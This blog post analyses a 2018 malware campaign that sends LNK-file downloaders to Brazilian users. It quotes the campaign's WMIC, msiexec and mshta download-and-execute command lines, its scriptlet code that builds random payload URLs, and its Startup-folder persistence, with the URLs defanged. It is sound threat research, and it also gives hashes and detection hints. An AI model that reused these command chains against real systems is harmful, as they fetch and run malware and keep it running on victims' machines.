Monday, 28 May 2018

LNK files targeting Brazilian Users

Recently, I observed a lot of LNK files crafted to target users located in Brazil. The details of this campaign are not documented anywhere and the final stage payloads (binary files) are not even present on public sources such as VirusTotal.

Interestingly, there are numerous references in the source code to characters from World of Warcraft in the form of variable names. The most important reference being: SABNOCK.

This campaign has been active for the past few months however they frequently keep updating.

The original attack vector is an LNK based Downloader sent inside a ZIP archive.

On 25th of May 2018, I observed an LNK file which leveraged WMIC to download the malicious MSI file.

Name of the LNK file: v114googlexx4.lnk
MD5 hash of the LNK file: ac212f8d998343e77edfab76cbf3656e
MD5 hash of the ZIP file: dadc0ec5a5460e8c30859cc6fc3d9d7a

Target of the LNK file: C:\WINDOWS\system32\wbem\WMIC.exe process call create "msiexec.exe /i hxxp:// /q"

And on 27th of May 2018, I already observed a new variant which updated the way the next stage payloads are downloaded.

Name of the LNK file:
MD5 hash of the LNK file: e288ebcfcf2b5b10f774618de059d66b
MD5 hash of the ZIP file: 65f127944263a99c2834d8abf6d408ec

Target of the LNK file: C:\WINDOWS\system32\Wbem\WMIC.exe  os get /format:"hxxp://"

This LNK file uses the technique of leveraging WMIC to download an XSL file which contains a script. This is possible by passing the command line parameter: "/format".

Geo IP check

It is important to note that the C&C Servers in this case use a Geo IP mechanism to ensure that the correct response is given only if the request is coming from the intended targeted region. In this case, the Geo IP check ensures that the request is coming from Brazil.

As an example, if I try to connect to the above URL using a non Brazil IP address, we can see that the Server returns a 404 Not Found Response as shown below:

Figure 1

I configured my TOR exit node to connect through Brazil. Now, when I attempt to connect to the above URL, it returns me the correct response as shown below:

Figure 2

XSL File Analysis

The main purpose of the XSL file in this case is to leverage mshta to download the malicious JavaScript file from the URL:

    var r = new ActiveXObject("WScript.Shell").Run('mshta.exe javascript:try{try{javascript:GetObject("script:ht"+"tp://");self.close();}catch(e){}}catch(e){};self.close();');

SCT File Analysis

This is the main Scriptlet file which performs the following main actions:

1. Downloads the next stage payloads from randomly chosen domains.
2. Configures the system for persistence.
3. Executes the next stage payloads.

Random Domain Selection

radador() is a function in this SCT file which is used to generate a random number between the min and max range supplied to it as arguments.

pingadori is a random number generated in the range, 1 to 52.

Corresponding to each number, there is a domain name which will be used to fetch the next stage payloads.

The complete list of domains is mentioned in the Appendix.

Downloading the Modules

The function, Bxaki() will take two parameters.

URL -> The URL from which it needs to fetch the file.
File -> The path where the file needs to be downloaded

All the files will be downloaded to the directory: %userprofile%\tempwd

The downloaded URLs are constructed as shown below:

xVRXastaroth2 = "ht"+"tp://vrx"+radador(1111111,9999999)+"."+xVRXastaroth+":"+radador(25010,25099)+"/"+ smaeVar;

1. It generates a random number in the range, 1111111 to 9999999 and appends it to the string: "http://vrx".
2. It generates another random number in the range, 25010 to 25099. This is the port number.

So, the download URLs have both static and dynamic parts. The reason for generating these random numbers is to prevent detection of the network traffic. Although, since there are still some static parts in the URL, so it is possible detect on that basis.

Below is a summary of the different files downloaded and the corresponding URLs:

sysvw.lnk - Downloaded from the URL: xVRXastaroth2 +""+radador(0000001,999999999)
SABNOCKXa.jpg - Downloaded from the URL: xVRXastaroth2 + ""+radador(0000001,999999999)
SABNOCKXb.jpg - Downloaded from the URL: xVRXastaroth2 + ""+radador(0000001,999999999)
SABNOCKXe.jpg - Downloaded from the URL: xVRXastaroth2 + ""+radador(0000001,999999999)
SABNOCKXf.jpg - Downloaded from the URL: xVRXastaroth2 + ""+radador(0000001,999999999)
SABNOCKXg.gif - Downloaded from the URL: xVRXastaroth2 + ""+radador(0000001,999999999)
SABNOCKXdwwn.gif - Downloaded from the URL: xVRXastaroth2 + ""+radador(0000001,999999999)
system64.exe - Downloaded from the URL: xVRXastaroth2 + "gerarhv121.php?"+radador(0000001,999999999)

system64.exe is the next stage payload which will be dropped and executed as shown below:

var xxWshShell = new ActiveXObject("WScript.Shell");"\\system64.exe  /xy /"+radador(0000001,999999999),0,true);

This binary will be executed with the command line arguments: "/xy /<random_number>"


The LNK file, sysvw.lnk is downloaded to the path: %userprofile%\tempwd\sysvw.lnk

This LNK file will be copied to the path: %appdata%\\microsoft\\windows\\start menu\\programs\\startup\\ for persistence.

The target of the LNK file is: C:\WINDOWS\explorer.exe /e,/start,system64.exe

It ensures that everytime the system is started, it will execute the system64.exe binary.

In the follow up blog post, I will share the details of the payload.



List of Domains used to fetch the next stage Payload  

No comments:

Post a Comment